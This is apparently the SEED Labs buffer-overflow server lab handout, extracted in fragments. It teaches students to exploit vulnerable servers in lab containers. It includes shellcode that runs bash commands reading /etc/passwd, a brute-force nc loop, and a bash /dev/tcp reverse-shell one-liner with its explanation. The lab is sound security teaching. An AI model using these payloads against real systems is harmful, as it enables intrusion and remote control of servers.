Buffer Overflow Server
Buffer Overflow Server
1 Overview
Buffer overflow is defined as the condition in which a program attempts to write data beyond the boundary
of a buffer. This vulnerability can be used by a malicious user to alter the flow control of the program,
leading to the execution of malicious code. The objective of this lab is for students to gain practical insights
into this type of vulnerability, and learn how to exploit the vulnerability in attacks.
In this lab, students will be given four different servers, each running a program with a buffer-overflow
vulnerability. Their task is to develop a scheme to exploit the vulnerability and finally gain the root privilege
on these servers. In addition to the attacks, students will also experiment with several countermeasures
against buffer-overflow attacks. Students need to evaluate whether the schemes work or not and explain
why. This lab covers the following topics:
Readings and videos. Detailed coverage of the buffer-overflow attack can be found in the following:
• Chapter 4 of the SEED Book, Computer & Internet Security: A Hands-on Approach, 2nd Edition, by
Wenliang Du. See details at https://www.handsonsecurity.net.
• Section 4 of the SEED Lecture at Udemy, Computer Security: A Hands-on Approach, by Wenliang
Du. See details at https://www.handsonsecurity.net/video.html.
Lab environment. This lab has been tested on the SEED Ubuntu 20.04 VM. You can download a pre-built
image from the SEED website, and run the SEED VM on your own computer. However, most of the SEED
labs can be conducted on the cloud, and you can follow our instruction to create a SEED VM on the cloud.
Note for instructors. Instructors can customize this lab by choosing values for L1, ..., L4. See Section 2.2
for details. Depending on the background of students and the time allocated for this lab, instructors can also
make the Level-2, Level-3, and Level-4 tasks (or some of them) optional. The Level-1 task is sufficient
to cover the basics of the buffer-overflow attacks. Levels 2 to 4 increase the attack difficulties. All the
countermeasure tasks are based on the Level-1 task, so skipping the other levels does not affect those tasks.
return 1;
}
The above program has a buffer overflow vulnerability. It reads data from the standard input, and then
passes the data to another buffer in the function bof(). The original input can have a maximum length
of 517 bytes, but the buffer in bof() is only BUF SIZE bytes long, which is less than 517. Because
strcpy() does not check boundaries, buffer overflow will occur.
The program will run on a server with the root privilege, and its standard input will be redirected to a
TCP connection between the server and a remote user. Therefore, the program actually gets its data from a
SEED Labs – Buffer Overflow Attack Lab (Server Version) 3
remote user. If users can exploit this buffer overflow vulnerability, they can get a root shell on the server.
Compilation. To compile the above vulnerable program, we need to turn off the StackGuard and the non-
executable stack protections using the -fno-stack-protector and "-z execstack" options. The
following is an example of the compilation command (the L1 environment variable sets the value for the
BUF SIZE constant inside stack.c).
$ gcc -DBUF_SIZE=$(L1) -o stack -z execstack -fno-stack-protector stack.c
We will compile the stack program into both 32-bit and 64-bit binaries. Our pre-built Ubuntu 20.04
VM is a 64-bit VM, but it still supports 32-bit binaries. All we need to do is to use the -m32 option in the
gcc command. For 32-bit compilation, we also use -static to generate a statically-linked binary, which
is self-contained and not depending on any dynamic library, because the 32-bit dynamic libraries are not
installed in our containers.
The compilation commands are already provided in Makefile. To compile the code, you need to type
make to execute those commands. The variables L1, L2, L3, and L4 are set in Makefile; they will be
used during the compilation. After the compilation, we need to copy the binary into the bof-containers
folder, so they can be used by the containers. The following commands conduct compilation and installation.
$ make
$ make install
For instructors (customization). To make the lab slightly different from the one offered in the past,
instructors can change the value for BUF SIZE by requiring students to compile the server code using
different BUF SIZE values. In Makefile, the BUF SIZE value is set by four variables L1, ..., L4.
Instructors should pick the values for these variables based on the following suggestions:
The Server Program. In the server-code folder, you can find a program called server.c. This is
the main entry point of the server. It listens to port 9090. When it receives a TCP connection, it invokes
the stack program, and sets the TCP connection as the standard input of the stack program. This way,
when stack reads data from stdin, it actually reads from the TCP connection, i.e. the data are provided
by the user on the TCP client side. It is not necessary for students to read the source code of server.c.
In the following, we list some of the commonly used commands related to Docker and Compose. Since
we are going to use these commands very frequently, we have created aliases for them in the .bashrc file
(in our provided SEEDUbuntu 20.04 VM).
$ docker-compose build # Build the container image
$ docker-compose up # Start the container
$ docker-compose down # Shut down the container
All the containers will be running in the background. To run commands on a container, we often need
to get a shell on that container. We first need to use the "docker ps" command to find out the ID of
the container, and then use "docker exec" to start a shell on that container. We have created aliases for
them in the .bashrc file.
$ dockps // Alias for: docker ps --format "{{.ID}} {{.Names}}"
$ docksh <id> // Alias for: docker exec -it <id> /bin/bash
$ docksh 96
root@9652715c8e0a:/#
If you encounter problems when setting up the lab environment, please read the “Common Problems”
section of the manual for potential solutions.
Note. It should be noted that before running "docker-compose build" to build the docker images,
we need to compile and copy the server code to the bof-containers folder. This step is described in
Section 2.2.
shellcode = (
"\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
"\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
"\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
"/bin/bash*" Ê
"-c*" Ë
"/bin/ls -l; echo Hello; /bin/tail -n 2 /etc/passwd *" Ì
# The * in this line serves as the position marker *
"AAAA" # Placeholder for argv[0] --> "/bin/bash"
"BBBB" # Placeholder for argv[1] --> "-c"
"CCCC" # Placeholder for argv[2] --> the command string
"DDDD" # Placeholder for argv[3] --> NULL
).encode(’latin-1’)
The shellcode runs the "/bin/bash" shell program (Line Ê), but it is given two arguments, "-c"
(Line Ë) and a command string (Line Ì). This indicates that the shell program will run the commands in the
second argument. The * at the end of these strings is only a placeholder, and it will be replaced by one byte
of 0x00 during the execution of the shellcode. Each string needs to have a zero at the end, but we cannot
put zeros in the shellcode. Instead, we put a placeholder at the end of each string, and then dynamically put
a zero in the placeholder during the execution.
If we want the shellcode to run some other commands, we just need to modify the command string
in Line Ì. However, when making changes, we need to make sure not to change the length of this string,
because the starting position of the placeholder for the argv[] array, which is right after the command
string, is hardcoded in the binary portion of the shellcode. If we change the length, we need to modify the
binary part. To keep the star at the end of this string at the same position, you can add or delete spaces.
You can find the generic shellcode in the shellcode folder. Inside, you will see two Python pro-
grams, shellcode 32.py and shellcode 64.py. They are for 32-bit and 64-bit shellcode, respec-
tively. These two Python programs will write the binary shellcode to codefile 32 and codefile 64,
respectively. You can then use call shellcode to execute the shellcode in them.
// Generate the shellcode binary
$ ./shellcode_32.py Ý generate codefile_32
$ ./shellcode_64.py Ý generate codefile_64
// Compile call_shellcode.c
$ make Ý generate a32.out and a64.out
Task. Please modify the shellcode, so you can use it to delete a file. Please include your modified the
shellcode in the lab report, as well as your screenshots.
4.1 Server
Our first target runs on 10.9.0.5 (the port number is 9090), and the vulnerable program stack is a
32-bit program. Let’s first send a benign message to this server. We will see the following messages printed
out by the target container (the actual messages you see may be different).
// On the VM (i.e., the attacker machine)
$ echo hello | nc 10.9.0.5 9090
Press Ctrl+C
The server will accept up to 517 bytes of the data from the user, and that will cause a buffer overflow.
Your job is to construct your payload to exploit this vulnerability. If you save your payload in a file, you can
send the payload to the server using the following command.
$ cat <file> | nc 10.9.0.5 9090
If the server program returns, it will print out "Returned Properly". If this message is not printed
out, the stack program has probably crashed. The server will still keep running, taking new connections.
For this task, two pieces of information essential for buffer-overflow attacks are printed out as hints to
students: the value of the frame pointer and the address of the buffer (lines marked by P). The frame point
register called ebp for the x86 architecture and rbp for the x64 architecture. You can use these two pieces
of information to construct your payload.
Added randomness. We have added a little bit of randomness in the program, so different students are
likely to see different values for the buffer address and frame pointer. The values only change when the
container restarts, so as long as you keep the container running, you will see the same numbers (the numbers
seen by different students are still different). This randomness is different from the address-randomization
countermeasure. Its sole purpose is to make students’ work a little bit different.
).encode(’latin-1’)
##################################################################
# Put the shellcode somewhere in the payload
start = 0 # I Need to change I
content[start:start + len(shellcode)] = shellcode
After you finish the above program, run it. This will generate the contents for badfile. Then feed
it to the vulnerable server. If your exploit is implemented correctly, the command you put inside your
shellcode will be executed. If your command generates some outputs, you should be able to see them from
the container window. Please provide proofs to show that you can successfully get the vulnerable server to
run your commands.
$./exploit.py // create the badfile
$ cat badfile | nc 10.9.0.5 9090
Reverse shell. We are not interested in running some pre-determined commands. We want to get a root
shell on the target server, so we can type any command we want. Since we are on a remote machine, if we
simply get the server to run /bin/sh, we won’t be able to control the shell program. Reverse shell is a
typical technique to solve this problem. Section 10 provides detailed instructions on how to run a reverse
shell. Please modify the command string in your shellcode, so you can get a reverse shell on the target
server. Please include screenshots and explanation in your lab report.
As you can see, the server only gives out one hint, the address of the buffer; it does not reveal the
value of the frame pointer. This means, the size of the buffer is unknown to you. That makes exploiting
the vulnerability more difficult than the Level-1 attack. Although the actual buffer size can be found in
Makefile, you are not allowed to use that information in the attack, because in the real world, it is
unlikely that you will have this file. To simplify the task, we do assume that the the range of the buffer size
is known. Another fact that may be useful to you is that, due to the memory alignment, the value stored in
the frame pointer is always multiple of four (for 32-bit programs).
Range of the buffer size (in bytes): [100, 300]
Your job is to construct one payload to exploit the buffer overflow vulnerability on the server, and get
a root shell on the target server (using the reverse shell technique). Please be noted, you are only allowed
to construct one payload that works for any buffer size within this range. You will not get all the credits if
you use the brute-force method, i.e., trying one buffer size each time. The more you try, the easier it will be
detected and defeated by the victim. That’s why minimizing the number of trials is important for attacks. In
your lab report, you need to describe your method, and provide evidences.
You can see the values of the frame pointer and buffer’s address become 8 bytes long (instead of 4 bytes
in 32-bit programs). Your job is to construct your payload to exploit the buffer overflow vulnerability of the
server. You ultimate goal is to get a root shell on the target server. You can use the shellcode from Task 1,
but you need to use the 64-bit version of the shellcode.
Challenges. Compared to buffer-overflow attacks on 32-bit machines, attacks on 64-bit machines is more
difficult. The most difficult part is the address. Although the x64 architecture supports 64-bit address space,
only the address from 0x00 through 0x00007FFFFFFFFFFF is allowed. That means for every address
SEED Labs – Buffer Overflow Attack Lab (Server Version) 9
(8 bytes), the highest two bytes are always zeros. This causes a problem.
In our buffer-overflow attacks, we need to store at least one address in the payload, and the payload will
be copied into the stack via strcpy(). We know that the strcpy() function will stop copying when it
sees a zero. Therefore, if a zero appears in the middle of the payload, the content after the zero cannot be
copied into the stack. How to solve this problem is the most difficult challenge in this attack. In your report,
you need to describe how you solve this problem.
Please send a hello message to the Level 1 and Level 3 servers, and do it multiple times. In your report,
please report your observation, and explain why ASLR makes the buffer-overflow attack more difficult.
Defeating the 32-bit randomization. It was reported that on 32-bit Linux machines, only 19 bites can be
used for address randomization. That is not enough, and we can easily hit the target if we run the attack for
sufficient number of times. For 64-bit machines, the number of bits used for randomization is significantly
increased.
In this task, we will give it a try on the 32-bit Level 1 server. We use the brute-force approach to attack
the server repeatedly, hoping that the address we put in our payload can eventually be correct. We will use
the payload from the Level-1 attack. You can use the following shell script to run the vulnerable program in
an infinite loop. If you get a reverse shell, the script will stop; otherwise, it will keep running. If you are not
so unlucky, you should be able to get a reverse shell within 10 minutes.
#!/bin/bash
SECONDS=0
value=0
while true; do
SEED Labs – Buffer Overflow Attack Lab (Server Version) 10
value=$(( $value + 1 ))
duration=$SECONDS
min=$(($duration / 60))
sec=$(($duration % 60))
echo "$min minutes and $sec seconds elapsed."
echo "The program has been running $value times so far."
cat badfile | nc 10.9.0.5 9090
done
Defeating the non-executable stack countermeasure. It should be noted that non-executable stack only
makes it impossible to run shellcode on the stack, but it does not prevent buffer-overflow attacks, because
there are other ways to run malicious code after exploiting a buffer-overflow vulnerability. The return-to-
libc attack is an example. We have designed a separate lab for that attack. If you are interested, please see
our Return-to-Libc Attack Lab for details.
SEED Labs – Buffer Overflow Attack Lab (Server Version) 11
The above nc command will block, waiting for a connection. We now directly run the following bash
program on the Server machine (10.0.2.5) to emulate what attackers would run after compromising the
server via the Shellshock attack. This bash command will trigger a TCP connection to the attacker machine’s
port 9090, and a reverse shell will be created. We can see the shell prompt from the above result, indicating
that the shell is running on the Server machine; we can type the ifconfig command to verify that the IP
address is indeed 10.0.2.5, the one belonging to the Server machine. Here is the bash command:
Server(10.0.2.5):$ /bin/bash -i > /dev/tcp/10.0.2.6/9090 0<&1 2>&1
The above command represents the one that would normally be executed on a compromised server. It is
quite complicated, and we give a detailed explanation in the following:
• "/bin/bash -i": The option i stands for interactive, meaning that the shell must be interactive
(must provide a shell prompt).
• "> /dev/tcp/10.0.2.6/9090": This causes the output device (stdout) of the shell to be
redirected to the TCP connection to 10.0.2.6’s port 9090. In Unix systems, stdout’s file
descriptor is 1.
• "0<&1": File descriptor 0 represents the standard input device (stdin). This option tells the system
to use the standard output device as the stardard input device. Since stdout is already redirected to
the TCP connection, this option basically indicates that the shell program will get its input from the
same TCP connection.
• "2>&1": File descriptor 2 represents the standard error stderr. This causes the error output to be
redirected to stdout, which is the TCP connection.
same TCP connection. In our experiment, when the bash shell command is executed on 10.0.2.5, it
connects back to the netcat process started on 10.0.2.6. This is confirmed via the "Connection
from 10.0.2.5 ..." message displayed by netcat.
11 Submission
You need to submit a detailed lab report, with screenshots, to describe what you have done and what you
have observed. You also need to provide explanation to the observations that are interesting or surprising.
Please also list the important code snippets followed by explanation. Simply attaching code without any
explanation will not receive credits.